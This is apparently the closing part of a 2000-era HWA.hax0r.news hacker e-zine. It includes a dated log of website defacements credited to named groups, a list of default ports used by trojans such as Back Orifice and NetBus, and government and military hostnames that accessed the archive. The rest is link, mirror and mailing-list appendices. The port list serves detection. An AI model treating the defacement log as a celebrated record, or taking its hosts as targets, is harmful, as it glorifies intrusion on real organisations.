[00.03.11] NT [Crime Boys] #2 Civilian Personnel Operations Center Management Agency (cpma.apg.army.mil)
[00.03.11] NT [Iceburg] Rivier College (www.rivier.edu)
[00.03.11] Ir [ ] Yamagishi Design Office (www.ntdosokai.org)
[00.03.11] Li [hektik] Index 4 PC (www.index4pc.com)
[00.03.11] NT [ ] Handsome Science and Technology Industrial Co. (www.handsome.com.tw)
[00.03.11] Bf [ActionDirectGroup] HackZone Russia (www.hackzone.ru)
[00.03.11] NT [rewted] Eureka College (www.eureka.edu)
[00.03.11] BI [dfs] Dead Protocol Society (www.deadprotocol.org)
[00.03.11] NT [rewted] Cumberland College (www.cumber.edu)
[00.03.11] NT [rewted] Avila College (www.avila.edu)
[00.03.11] La [mojo] Han Bee Industrial (hanbee.co.kr)
[00.03.10] NT [Crime Boys] #2 ROTC, Second Region Headquarters, Fort Knox (www.2rotc.army.mil)
[00.03.10] NT [nore] #2 Poder Judicial de Santa Fe (santafe.poderjudicial-sfe.gov.ar)
[00.03.10] NT [fox] Alabama State Legislature Web site (www.legislature.state.al.us)
[00.03.10] NT [Cyber Fuckers] Parliament of the Russian Federation (www.parliament.ru)
[00.03.10] NT [Mayhem] Tebecai Telecom B.V. (www.tebenet.nl)
[00.03.10] NT [Neon-Lenz] Sensible Computer Solutions (www.sensible-net.com)
[00.03.10] NT [Neon-Lenz] Hotel & Restaurantskolen (www.hrs.dk)
[00.03.10] Lm [ ] C GNerds (www.gnerds.com)
[00.03.10] NT [ICE] Danish Music Agency (www.dmamusic.dk)
[00.03.10] NT [Pakistan HC] M Zee Network (www.zeenews.com)
[00.03.10] Li [dutp0k] M Hearth Reality (www.hearth-realty.com)
[00.03.09] NT [Cyber Fuckers] C Iran Ministry of Health and Medical Education (www.mohem.gov.ir)
[00.03.09] NT [IZ corp.] Finaciadora de Estudos e Projetos (www.finep.gov.br)
[00.03.09] So [n30] Zed Kidz Ltd. (www.zed.co.uk)
[00.03.09] NT [OursTeam] Global Aviation Information Network (www.gainweb.org)
[00.03.09] NT [ ] Fertilance Equipamentos Ltda (www.fertilance.com.br)
[00.03.08] NT [nore] #2 Office of the Speaker of the House (www.speaker.gov)
[00.03.08] NT [j0x] #2 The Gallup Organization (www.gallup.com)
[00.03.08] NT [ ] Web List Brazil (www.weblistbr.com.br)
[00.03.08] NT [ ] Unihold Administra��o Partic. Ltda (www.unihold.com.br)
[00.03.08] Li [h3xx0r] Solincs (www.solincs.com)
[00.03.08] NT [mr_ozzy] Servi�o de Aprendizado Rural ao Adolecente (www.projetosara.org.br)
[00.03.08] NT [mr_ozzy] MetalNet Brazil (www.metalnet.com.br)
[00.03.08] Li [h3xx0r] Irfan Textiles (www.irfantextiles.com)
[00.03.08] NT [nore] Houston Advanced Research Center (www.harc.edu)
[00.03.08] Bf [Saiko-Pod] Fragile (www.fragile.org)
[00.03.08] NT [ ] M Disktrans Comercial Ltda (www.disktrans.com.br)
[00.03.07] Lb [sil] M Bamchef (www.bamchef.com)
[00.03.07] NT [ka0x] Washington State Military Department (cpmurray-www.army.mil)
[00.03.07] NT [Team Illusions] These Last Days Ministries (www.tldm.org)
[00.03.07] NT [Team Illusions] Southern New England Telephone (www.snet.com)
[00.03.07] Bf [mojo] Phlux (www.phlux.org)
[00.03.07] Ir [crazy_bit] C Pandawa Lima (www.pandawa5.com)
[00.03.07] NT [RAT] ALON Israel Oil Company (www.oak.co.il)
[00.03.07] NT [fox] Michigan Department of Agriculture (www.mda.state.mi.us)
[00.03.07] NT [#phreak.nl] C Faculty of Information Technology and Systems, Technische Universiteit Delft (www.its.tudelft.nl)
[00.03.07] [mr_min] E-Financial Inc (www.efin.com)
[00.03.07] So [Ph33r the b33r] Behold.Net (www.behold.net)
[00.03.07] NT [CyberArmy] Aapexx Corp (www.aapexx.com)
[00.03.07] NT [ka0x] Clar�n Digital (chat.clarin.com.ar)
[00.03.07] NT [CIH] FMC Corporation, Farming Solutions (ag.fmc.com)
[00.03.06] Li [shock troops] M The Lab, Inc (www.thelabinc.com)
[00.03.06] Li [shock troops] M Suede Records (www.suederecords.com)
[00.03.06] NT [Team Infinity] Peterborough Council (www.peterborough.gov.uk)
[00.03.06] NT [Artech] St. Aubin Technologies, Inc. (www.st-aubin.org)
[00.03.06] NT [Team Infinity] Raleigh, North Carolina (www.raleigh-nc.org)
[00.03.06] NT [Hack 2600] Malaysia Airlines (www.malaysiaairlines.com.my)
[00.03.06] NT [Pakistan HC] Made in India (www.madeinindia.com)
[00.03.06] NT [Team Infinity] League of Minnesota Cities (www.lmnc.org)
[00.03.06] NT [Artech] Homestead Transfer & Storage Co. (www.homesteadtransfer.com)
[00.03.06] NT [Team Infinity] Edison Township (www.edisonnj.org)
[00.03.06] Ls [Kaw00t] Baldermann GmbH (www.darc.de)
[00.03.06] NT [Team Infinity] City of Bowie (www.cityofbowie.org)
[00.03.06] Li [mojo] National Penghu Institute of Marine & Management Technology (travel.ph.edu.tw)
[00.03.06] NT [nore] University of Florida Department of Anesthesiology (gasser.anest.ufl.edu)
[00.03.06] NT [crazy bit] Tee Plus (www.teeplus.com)
[00.03.06] Li [shock troops] Suede Records (www.suederecords.com)
[00.03.06] La [mojo] Masan City Hall (webmail.masan.kyongnam.kr)
[00.03.05] NT [AntiOnline] C The Gallup Organization (www.gallup.com)
[00.03.05] Bf [ ] Wired Connection (www.wiredconnection.org)
[00.03.05] Bf [b1n-l4d3n hac0rz] Vanier College (www.vaniercollege.net)
[00.03.05] NT [Artech] Name Our Child (www.nameourchild.com)
[00.03.05] [ ] Mashal Books (www.mashalbooks.com)
[00.03.05] Li [OHB] Laborat�rio de Matem�tica Aplicada da Universidade Federal do Rio de Janeiro (www.labma.ufrj.br)
[00.03.05] NT [Cyber Fuckers] Elite Calendar (www.elitecalendar.com)
[00.03.05] Lr [OHB] Centro de processamento de Dados do Rio de Janeiro (www.alerj.rj.gov.br)
[00.03.04] NT [CIH] Universita degli Studi di Parma (www.ceda.unipr.it)
[00.03.04] NT [Pakistani HC] Parliment of India (alfa.nic.in)
[00.03.04] NT [ph33r the b33r] United Network for Organ Sharing (www.unos.org)
[00.03.04] NT [Artech] M UK Jobs (www.uk-jobs.co.uk)
[00.03.04] NT [CIH] Tennessee State University (www.tnstate.edu)
[00.03.04] NT [CIH] St. Louis Metropolitan Sewer District (www.stlmsd.com)
[00.03.04] NT [CIH] College of the Siskiyous (www.siskiyous.edu)
[00.03.04] NT [Cyber Fuckers] Russian Scientific Center for Legal Information, Ministry of Justice (www.scli.ru)
[00.03.04] NT [CIH] RomTec Plc (www.romtec.co.uk)
[00.03.04] NT [Tr1pl3 S31S] C Race Lesotho (www.race.co.ls)
[00.03.04] NT [CIH] Monmouth College (www.monm.edu)
[00.03.04] NT [CIH] University of St. Thomas Library (www.lib.stthomas.edu)
[00.03.04] NT [Cyber Fuckers] Int Idea Sweden (www.int-idea.se)
[00.03.04] NT [CIH] Goddard College (www.goddard.edu)
[00.03.04] NT [Cyber Fuckers] Association of EDI Users (www.editrans.ru)
[00.03.04] NT [CIH] Bitstop, Inc (www.dagupan.com)
[00.03.04] BI [K0ad] M Custom Systems (www.customcomsystems.com)
[00.03.04] Li [Azid Forze] Classic Amiga (www.classicamiga.com)
[00.03.04] NT [HackUnity] 98 Skate (www.98skate.org)
[00.03.04] BI [K0ad] CU Naked (cunaked.net)
[00.03.04] So [ ] Korea National University of Education (cc-sun.knue.ac.kr)
[00.03.03] [ ] Playstation 2 (www.playstation2.co.jp)
[00.03.03] NT [CIH] Assocation for Windows NT System Professionals (www.ntpro.org)
[00.03.03] NT [ ] K.Net Telecomunica��es Ltda. (www.knet.com.br)
[00.03.03] [kernel panic] CyberCT Malaysia (www.cyberct.com.my)
[00.03.03] NT [ ] Birmingham Windows NT User Group (www.bwntug.org)
[00.03.03] NT [Tr1pl3 S31S] C Bloem S.A. (www.bloem.co.za)
[00.03.03] NT [bash] Aware, Inc. (www.aware.com)
[00.03.03] NT [Pakistani HC] Ahmedabad Telephone Online Directory, Ahmedabad Telecom District (www.amtel.gov.in)
[00.03.03] Li [h3xx0r] Fly Pakistan (fly.com.pk)
[00.03.02] NT [zillion] Quality Business Solutions (www.qbs.com.au)
[00.03.02] NT [zillion] Out (www.outvak.nl)
[00.03.02] NT [RAT] Internet Exposure (www.iexposure.com)
[00.03.02] NT [hack.be] Belgium Province de Hainaut (www.hainaut.be)
[00.03.02] NT [Team Zero G] Glen Cove School District (www.glencove.k12.ny.us)
[00.03.02] NT [team infinity] Germantown Academy (www.ga.k12.pa.us)
[00.03.02] NT [hack.be] Federatie van Wervings- en Selectiebureaus (www.fws.be)
[00.03.02] NT [Pakistani HC] Engineering Export Promotion Council, Ministry of Commerce, India (www.eepc.gov.in)
[00.03.01] NT [ADM] C AntiOnline's AntiCode (www.anticode.com)
[00.03.01] Bn [Haks-r-us] Pigman (pigman.octothorpe.com)
[00.03.01] Li [h3xx0r] Lasani (www.lasani.com)
[00.03.01] NT [team infinity] What Online (www.what.com)
[00.03.01] [Starman_Jones] Weston High School (www.westonhighschool.com)
[00.03.01] NT [OHB] Vasco Boutique (www.vascoboutique.com.br)
[00.03.01] NT [team infinity] True Systems (www.true.com)
[00.03.01] NT [Crime Boys] Siemens Italy (www.siemens.it)
[00.03.01] NT [zillion] Progress Korea (www.progress.co.kr)
[00.03.01] NT [team infinity] Phase Devices Ltd. (www.phase.com)
[00.03.01] NT [ ] National Treasury Employees Union (www.nteu.org)
[00.03.01] NT [ ] National Postal Mail Handlers Union (www.npmhu.org)
[00.03.01] [GForce Pakistan] M Metricks (www.metricks.com)
[00.03.01] NT [team infinity] Massachusetts Higher Education Network (www.mass.edu)
[00.03.01] Li [ ] The London Institute (www.linst.ac.uk)
[00.03.01] Lr [MAN KEKE KTNX] Fort Campbell School System (tech.fced.org)
[00.03.01] NT [MaStErBiLL] MaxiDATA Tecnologia e Informatica Ltda (listas.maxidata.com)
and more sites at the attrition cracked web sites mirror:
http://www.attrition.org/mirror/attrition/index.html
-------------------------------------------------------------------------
A.0 APPENDICES
_________________________________________________________________________
By: joakim.von.braun@risab.se
Source: PSS
Common Trojan ports to watch for:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
After seeing several questions about traffic directed at ports as 31337 and
12345 I've put together a list of all trojans known to me and the default
ports they are using. Of course several of them could use any port, but I
hope this list will maybe give you a clue of what might be going on.
port 21 - Blade Runner, Doly Trojan, Fore, Invisible FTP, WebEx,
WinCrash
port 23 - Tiny Telnet Server
port 25 - Antigen, Email Password Sender, Haebu Coceda, Shtrilitz
Stealth, Terminator, WinPC, WinSpy
port 31 - Hackers Paradise
port 80 - Executor
port 456 - Hackers Paradise
port 555 - Ini-Killer, Phase Zero, Stealth Spy
port 666 - Satanz Backdoor
port 1001 - Silencer, WebEx
port 1011 - Doly Trojan
port 1170 - Psyber Stream Server, Voice
port 1234 - Ultors Trojan
port 1245 - VooDoo Doll
port 1492 - FTP99CMP
port 1600 - Shivka-Burka
port 1807 - SpySender
port 1981 - Shockrave
port 1999 - BackDoor
port 2001 - Trojan Cow
port 2023 - Ripper
port 2115 - Bugs
port 2140 - Deep Throat, The Invasor
port 2801 - Phineas Phucker
port 3024 - WinCrash
port 3129 - Masters Paradise
port 3150 - Deep Throat, The Invasor
port 3700 - Portal of Doom
port 4092 - WinCrash
port 4590 - ICQTrojan
port 5000 - Sockets de Troie
port 5001 - Sockets de Troie
port 5321 - Firehotcker
port 5400 - Blade Runner
port 5401 - Blade Runner
port 5402 - Blade Runner
port 5569 - Robo-Hack
port 5742 - WinCrash
port 6670 - DeepThroat
port 6771 - DeepThroat
port 6969 - GateCrasher, Priority
port 7000 - Remote Grab
port 7300 - NetMonitor
port 7301 - NetMonitor
port 7306 - NetMonitor
port 7307 - NetMonitor
port 7308 - NetMonitor
port 7789 - ICKiller
port 9872 - Portal of Doom
port 9873 - Portal of Doom
port 9874 - Portal of Doom
port 9875 - Portal of Doom
port 9989 - iNi-Killer
port 10067 - Portal of Doom
port 10167 - Portal of Doom
port 11000 - Senna Spy
port 11223 - Progenic trojan
port 12223 - Hack�99 KeyLogger
port 12345 - GabanBus, NetBus
port 12346 - GabanBus, NetBus
port 12361 - Whack-a-mole
port 12362 - Whack-a-mole
port 16969 - Priority
port 20001 - Millennium
port 20034 - NetBus 2 Pro
port 21544 - GirlFriend
port 22222 - Prosiak
port 23456 - Evil FTP, Ugly FTP
port 26274 - Delta
port 31337 - Back Orifice
port 31338 - Back Orifice, DeepBO
port 31339 - NetSpy DK
port 31666 - BOWhack
port 33333 - Prosiak
port 34324 - BigGluck, TN
port 40412 - The Spy
port 40421 - Masters Paradise
port 40422 - Masters Paradise
port 40423 - Masters Paradise
port 40426 - Masters Paradise
port 47262 - Delta
port 50505 - Sockets de Troie
port 50766 - Fore
port 53001 - Remote Windows Shutdown
port 61466 - Telecommando
port 65000 - Devil
You'll find the list on the following address:
http://www.simovits.com/nyheter9902.html (still in Swedish but it will be
translated in the near future).
To help anyone to detect trojan attacks, I�m planning to add information
about the original names of the executables, their size, where they usually
are hiding, and the names of any helpfiles they may use. I will also add
tools or links to tools that may be of your assistance.
Feel free to get back to me with any comments or suggestions. If you find
new trojans I�ll love to get my hands on them, but please mail me first, as
I don�t need more than one copy. If you have live experiance of trojan
attacks I�m interested to read about your findings.
Joakim
joakim.von.braun@risab.se
A.1 PHACVW, sekurity, security, cyberwar links
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The links are no longer maintained in this file, there is now a
links section on the http://welcome.to/HWA.hax0r.news/ url so check
there for current links etc.
The hack FAQ (The #hack/alt.2600 faq)
http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html
Hacker's Jargon File (The quote file)
http://www.lysator.liu.se/hackdict/split2/main_index.html
New Hacker's Jargon File.
http://www.tuxedo.org/~esr/jargon/
HWA.hax0r.news Mirror Sites around the world:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://blkops.venomous.net/hwa_hax0r_news/hwa_hax0r_news.asp ** NEW **
http://datatwirl.intranova.net ** NEW **
http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/ ** NEW **
http://net-security.org/hwahaxornews ** NEW **
http://www.sysbreakers.com/hwa ** NEW **
http://www.attrition.org/hosted/hwa/
http://www.attrition.org/~modify/texts/zines/HWA/
http://www.hackunlimited.com/zine/hwa/ *UPDATED*
http://www.ducktank.net/hwa/issues.html. ** NEW **
http://www.alldas.de/hwaidx1.htm ** NEW **
http://www.csoft.net/~hwa/
http://www.digitalgeeks.com/hwa.*DOWN*
http://members.tripod.com/~hwa_2k
http://welcome.to/HWA.hax0r.news/
http://www.attrition.org/~modify/texts/zines/HWA/
http://archives.projectgamma.com/zines/hwa/.
http://www.403-security.org/Htmls/hwa.hax0r.news.htm
http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/
http://hwa.hax0r.news.8m.com/
http://www.fortunecity.com/skyscraper/feature/103/
International links:(TBC)
~~~~~~~~~~~~~~~~~~~~~~~~~
Foreign correspondants and others please send in news site links that
have security news from foreign countries for inclusion in this list
thanks... - Ed
Belgium.......: http://securax.org/cum/ *New address*
(Dutch) http://www.securax.org/ *New*
Brasil........: http://www.psynet.net/ka0z
http://www.elementais.cjb.net
Canada .......: http://www.hackcanada.com
Croatia.......: http://security.monitor.hr
Colombia......: http://www.cascabel.8m.com
http://www.intrusos.cjb.net
Finland ........http://hackunlimited.com/
Germany ........http://www.alldas.de/
http://www.security-news.com/
Indonesia.....: http://www.k-elektronik.org/index2.html
http://members.xoom.com/neblonica/
http://hackerlink.or.id/
Netherlands...: http://security.pine.nl/
Russia........: http://www.tsu.ru/~eugene/
Singapore.....: http://www.icepoint.com
South Africa ...http://www.hackers.co.za
http://www.hack.co.za ** DOWN AGAIN **
http://www.posthuman.za.net
Turkey........: http://www.trscene.org - Turkish Scene is Turkey's first
and best security related e-zine.
.za (South Africa) sites contributed by wyzwun tnx guy...
Got a link for this section? email it to cruciphux@dok.org and i'll
review it and post it here if it merits it.
@HWA
A.2 Hot Hits
~~~~~~~~
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
Today the spotlight may be on you, some interesting machines that
have accessed these archives recently...
_ _ _
| | | | ___ | |_
| |_| |/ _ \| __|
| _ | (_) | |_
|_| |_|\___/ \__|
_ _ _ _
| | | (_) |
| |__| |_| |_ ___
| __ | | __/ __|
| | | | | |_\__ \
|_| |_|_|\__|___/
.gov and .mil activity
Updated Feb 2000
ag.ncis.navy.mil
obgate,hill.af.mil
hqs-ras-p34.ncr.disa.mil
proxy.san.mrms.navy.mil
security3.nrl.navy.mil
shq-ot-1178.nosc.mil
legion.dera.gov.uk
bogon.llnl.gov
dogpatch.llnl.gov
fitzgerald.ags.bnl.gov
zephyr1.pnl.gov
ihvideo.lewisham.gov.uk
shihonage.gsfc.nasa.gov
burnia.dmz.health.nsw.gov.au
ococ.oc.ca.gov
guardian.gov.sg
aragorn.dpa.act.gov.au
ipaccess.gov.ru
eagle-ts222.korea.army.mil
gate1.noc.usmc.mil
eagle-ts209.korea.army.mil
proxy.vandenberg.af.mil
lax.dcmdw.dla.mil
beowulf.ramstein.af.mil
cofcs71.aphis.usda.gov
samds4.sam.pentagon.mil
eg-016-045.eglin.af.mil
pacfa.evepier.navy.mil
obgate.hill.af.mil
biglost.inel.gov
marshall.state.gov
flatline.arc.nasa.gov
mars.istac.gov
gateway1.osd.mil
gateway3.osd.mil
elan5172.cbcph.navy.mil
proxy.gintic.gov.sg
doegate.doe.gov
sunspot.gsfc.nasa.gov
gate1.mcbh.usmc.mil
homer.nawcad.navy.mil
maggie.nawcad.navy.mil
lisa.nawcad.navy.mil
msproxy.transcom.mil
b-kahuna.hickam.af.mil
sc034ws109.nosc.mil
infosec.se
gate2.mcbutler.usmc.mil
sc034ws109.nosc.mil
shq-ot-1178.nosc.mil
dhcp-036190.scott.af.mil
mcreed.lan.teale.ca.gov
dodo.nist.gov
mc1926.mcclellan.af.mil
kwai11.nsf.gov
enduser.faa.gov
vasfw02,fdic.gov
lisa.defcen.gov.au
ps1.pbgc.gov
guardian.gov.sg
amccss229116.scott.af.mil
sc022ws224.nosc.mil
sheppard2.hurlburt.af.mil
marshall.us-state.gov
digger1.defence.gov.au
firewall.mendoza.gov.ar
ipaccess.gov.ru
gatekeeper.itsec-debis.de
fgoscs.itsec-debis.de
fhu-ed4ccdf.fhu.disa.mil
citspr.tyndall.af.mil
kelsatx2.kelly.af.mil
kane.sheppard.af.mil
relay5.nima.mil
host.198-76-34-33.gsa.gov
ntsrvr.vsw.navy.mil
saic2.nosc.mil
wygate.wy.blm.gov
mrwilson.lanl.gov
p722ar.npt.nuwc.navy.mil
ws088228.ramstein.af.mil
car-gw.defence.gov.au
unknown-c-23-147.latimes.com
nytgate1.nytimes.com
There are some interesting machines among these, the *.nosc.mil boxes are
from SPAWAR information warfare centres, good Is It Worth It Followup to see
our boys keeping up with the news... - Ed
@HWA
A.3 Mirror Sites List
~~~~~~~~~~~~~~~~~
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
__ __ _
| \/ (_)_ __ _ __ ___ _ __ ___
| |\/| | | '__| '__/ _ \| '__/ __|
| | | | | | | | | (_) | | \__ \
|_| |_|_|_| |_| \___/|_| |___/
Some of these are not keeping up with new issues like they should be, you
can always get the latest issue from www.csoft.net/~hwa or join us on IRC
(EFnet) in channel #hwa.hax0r.news and check the topic or ask Cruciphux
where the latest issues may be attained. I also upload all issues to
etext.org, the zines are available thru their ftp service, updates are slow.
- Ed
New mirror sites
*** http://blkops.venomous.net/hwa_hax0r_news/hwa_hax0r_news.asp *** NEW ***
*** http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/ ***
http://datatwirl.intranova.net * NEW *
http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/
http://net-security.org/hwahaxornews
http://www.attrition.org/hosted/hwa/
http://hwazine.cjb.net/
http://www.hackunlimited.com/files/secu/papers/hwa/
http://www.attrition.org/~modify/texts/zines/HWA/
* http://hwa.hax0r.news.8m.com/
* http://www.fortunecity.com/skyscraper/feature/103/
* Crappy free sites of no use to anyone. too lazy to kill em.
*** Most likely to be up to date other than the main site.
HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net
thanks to airportman for the Cubesoft bandwidth. Also shouts out to all
our mirror sites! and p0lix for the (now expired) digitalgeeks archive
tnx guys.
http://www.csoft.net/~hwa
HWA.hax0r.news Mirror Sites:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://blkops.venomous.net/hwa_hax0r_news/hwa_hax0r_news.asp
http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/
http://www.attrition.org/hosted/hwa/
http://www.attrition.org/~modify/texts/zines/HWA/
http://www.alldas.de/hwaidx1.htm ** NEW ** CHECK THIS ONE OUT **
http://www.csoft.net/~hwa/
http://welcome.to/HWA.hax0r.news/
http://www.attrition.org/~modify/texts/zines/HWA/
http://www.projectgamma.com/archives/zines/hwa/
http://www.403-security.org/Htmls/hwa.hax0r.news.htm
@HWA
A.4 The hacker's Ethic (90's Style)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
_ _ _ _ _____ _ _ _
| | | | __ _ ___| | _____ _ __( )__| ____| |_| |__ (_) ___
| |_| |/ _` |/ __| |/ / _ \ '__|/ __| _| | __| '_ \| |/ __|
| _ | (_| | (__| < __/ | \__ \ |___| |_| | | | | (__
|_| |_|\__,_|\___|_|\_\___|_| |___/_____|\__|_| |_|_|\___|
Sadly, due to the traditional ignorance and sensationalizing of the mass
media, the once-noble term hacker has become a perjorative.
Among true computer people, being called a hacker is a compliment. One of
the traits of the true hacker is a profoundly antibureaucratic and
democratic spirit. That spirit is best exemplified by the Hacker's Ethic.
This ethic was best formulated by Steven Levy in his 1984 book Hackers:
Heroes of the Computer Revolution. Its tenets are as follows:
1 - Access to computers should be unlimited and total.
2 - All information should be free.
3 - Mistrust authority - promote decentralization.
4 - Hackers should be judged by their hacking not bogus criteria such as
degrees, age, race, or position.
5 - You create art and beauty on a computer,
6 - Computers can change your life for the better.
The Internet as a whole reflects this ethic.
@HWA
A.5 Sources *** (VERY incomplete)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
____
/ ___| ___ _ _ _ __ ___ ___ ___
\___ \ / _ \| | | | '__/ __/ _ Y __|
___) | (_) | |_| | | | (_| __|__ \
|____/ \___/ \__,_|_| \___\___|___/
Sources can be some, all, or none of the following (by no means complete
nor listed in any degree of importance) Unless otherwise noted, like msgs
from lists or news from other sites, articles and information is compiled
and or sourced by Cruciphux no copyright claimed.
News site.........................http://www.ukhackers.com/ *NEW*
News site.........................http://www.hackernews.com.br/ *NEW*
News & I/O zine ................. http://www.antionline.com/
Back Orifice/cDc..................http://www.cultdeadcow.com/
*News site (HNN) .....,............http://www.hackernews.com/
Help Net Security.................http://net-security.org/
News,Advisories,++ .(lophtcrack)..http://www.l0pht.com/
NewsTrolls .(daily news ).........http://www.newstrolls.com/
General Security/Exploits.........http://packetstorm.securify.com/
News + Exploit archive ...........http://www.rootshell.com/beta/news.html
CuD Computer Underground Digest...http://www.soci.niu.edu/~cudigest
News site+........................http://www.zdnet.com/
News site+Security................http://www.gammaforce.org/
News site+Security................http://www.projectgamma.com/
News site+Security................http://securityhole.8m.com/
News site+Security related site...http://www.403-security.org/
News/Humour site+ ................http://www.innerpulse.com
News/Techie news site.............http://www.slashdot.org
* HNN Also archives back issues of their news, use the following url format
http://www.hackernews.com/arch.html?012700
where 01=Jan 27=Date 00=Year. They are archived here also as part of the
compilation and broad archival concept we are trying to maintain with this
publication. - Ed
+Various mailing lists and some newsgroups, such as ...
+other sites available on the HNN affiliates page, please see
http://www.hackernews.com/affiliates.html as they seem to be popping up
rather frequently ...
http://www.the-project.org/ .. IRC list/admin archives
http://www.anchordesk.com/ .. Jesse Berst's AnchorDesk
alt.hackers.malicious
alt.hackers
alt.2600
BUGTRAQ
ISN security mailing list
ntbugtraq
win2kbugtraq
<+others>
@HWA
A.6 Resources
~~~~~~~~~
___
| _ \___ ______ _ _ _ _ __ ___ ___
| / -_|_-< _ \ || | '_/ _/ -_|_-<
|_|_\___/__|___/\_,_|_| \__\___/__/
NEWS Agencies, News search engines etc:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
PLEASE if you have any changes or additions for this section please
mail them to cruciphux@dok.org. Thank you.
http://www.newsnow.co.uk/-NewsFeed.Tech.htm *NEW* from Tep
http://www.cnn.com/SEARCH/
http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0
http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack
http://www.ottawacitizen.com/business/
http://search.yahoo.com.sg/search/news_sg?p=hack
http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack
http://www.zdnet.com/zdtv/cybercrime/
http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)
NOTE: See appendices for details on other links.
http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm
http://freespeech.org/eua/ Electronic Underground Affiliation
http://ech0.cjb.net ech0 Security
http://axon.jccc.net/hir/ Hackers Information Report
http://net-security.org Net Security
http://www.403-security.org Daily news and security related site
http://www.hack.co.za/ Current exploits archive ** DOWN **
** Due to excessive network attacks this site was being mirrored
at http://www.siliconinc.net/hack/ if the above link is down again try here.
Please send in links that you think should belong here to keep this section
up to date, it is overdue updating!.
A.7 Submissions/Hints/Tips/Etc
~~~~~~~~~~~~~~~~~~~~~~~~~~
____ _ _ _
/ ___| _ _| |__ _ __ ___ (_)___ ___(_) ___ _ __ ___
\___ \| | | | '_ \| '_ ` _ \| / __/ __| |/ _ \| '_ \/ __|
___) | |_| | |_) | | | | | | \__ \__ \ | (_) | | | \__ \
|____/ \__,_|_.__/|_| |_| |_|_|___/___/_|\___/|_| |_|___/
All submissions that are `published' are printed with the credits
you provide, if no response is received by a week or two it is assumed
that you don't care wether the article/email is to be used in an issue
or not and may be used at my discretion.
Looking for:
Good news sites that are not already listed here OR on the HNN affiliates
page at http://www.hackernews.com/affiliates.html
Magazines (complete or just the articles) of breaking sekurity or hacker
activity in your region, this includes telephone phraud and any other
technological use, abuse hole or cool thingy. ;-) cut em out and send it
to the drop box.
- Ed
A.8 Mailing list Info
~~~~~~~~~~~~~~~~~
Mailing List Subscription Info (Far from complete) Feb 1999
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~
ISS Security mailing list faq : http://www.iss.net/iss/maillist.html
ATTRITION.ORG's Website defacement mirror and announcement lists
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.attrition.org/mirror/attrition/
http://www.attrition.org/security/lists.html
--
defaced [web page defacement announce list]
This is a public LOW VOLUME (1) mail list to circulate news/info on
defaced web sites. To subscribe to Defaced, send mail to
majordomo@attrition.org with "subscribe defaced" in the BODY of
the mail.
There will be two types of posts to this list:
1. brief announcements as we learn of a web defacement.
this will include the site, date, and who signed the
hack. we will also include a URL of a mirror of the hack.
2. at the end of the day, a summary will be posted
of all the hacks of the day. these can be found
on the mirror site listed under 'relevant links'
This list is for informational purposes only. Subscribing
denotes your acceptance of the following:
1. we have nothing to do with the hacks. at all.
2. we are only mirroring the work of OTHER people.
3. we can not be held liable for anything related to these
hacks.
4. all of the points on the disclaimer listed below.
Under no circumstances may the information on this list be used
to solicit security business. You do not have permission to forward
this mail to anyone related to the domain that was defaced.
enjoy.
List maintainer: mcintyre@attrition.org
Hosted by: majordomo@attrition.org
Relevant Links:
Disclaimer: http://www.attrition.org/mirror/attrition/notes.html
ATTRITION Mirror: http://www.attrition.org/mirror/
(1) It is low volume on a normal day. On days of many defacements,
traffic may be increased. On a few days, it is a virtual mail
flood. You have been warned. ;)
-=-
--
defaced summary [web page defacement announce list]
This is a low traffic mail list to announce all publicly
defaced domains on a given day. To subscribe to Defaced-Summary, send mail to
majordomo@attrition.org with "subscribe defaced-summary" in the BODY of
the mail.
There will be ONE type of post to this list:
1. a single nightly piece of mail listing all reported
domains. the same information can be found on
http://www.attrition.org/mirror/attrition/
via sporadic updates.
This list is for informational purposes only. Subscribing
denotes your acceptance of the following:
1. we have nothing to do with the hacks. at all.
2. we are only mirroring the work of OTHER people.
3. we can not be held liable for anything related to these
hacks.
4. all of the points on the disclaimer listed below.
Under no circumstances may the information on this list be used
to solicit security business. You do not have permission to forward
this mail to anyone related to the domain that was defaced.
enjoy.
List maintainer: jericho@attrition.org
Hosted by: majordomo@attrition.org
Relevant Links:
Disclaimer: http://www.attrition.org/mirror/attrition/notes.html
ATTRITION Mirror: http://www.attrition.org/mirror/
-=-
defaced GM [web page defacement announce list]
This is a low traffic mail list to announce all publicly
defaced government and military domains on a given day. To subscribe to
Defaced-GM, send mail to majordomo@attrition.org with "subscribe defaced-gm"
in the BODY of the mail.
There will be ONE type of post to this list:
1. sporadic pieces of mail for each government (.gov)
or military (.mil) system defaced. the same information
can be found on http://www.attrition.org/mirror/attrition/
via sporadic updates.
This list is designed primarily for government and military
personell charged with tracking security incidents on
government run networks.
This list is for informational purposes only. Subscribing
denotes your acceptance of the following:
1. we have nothing to do with the hacks. at all.
2. we are only mirroring the work of OTHER people.
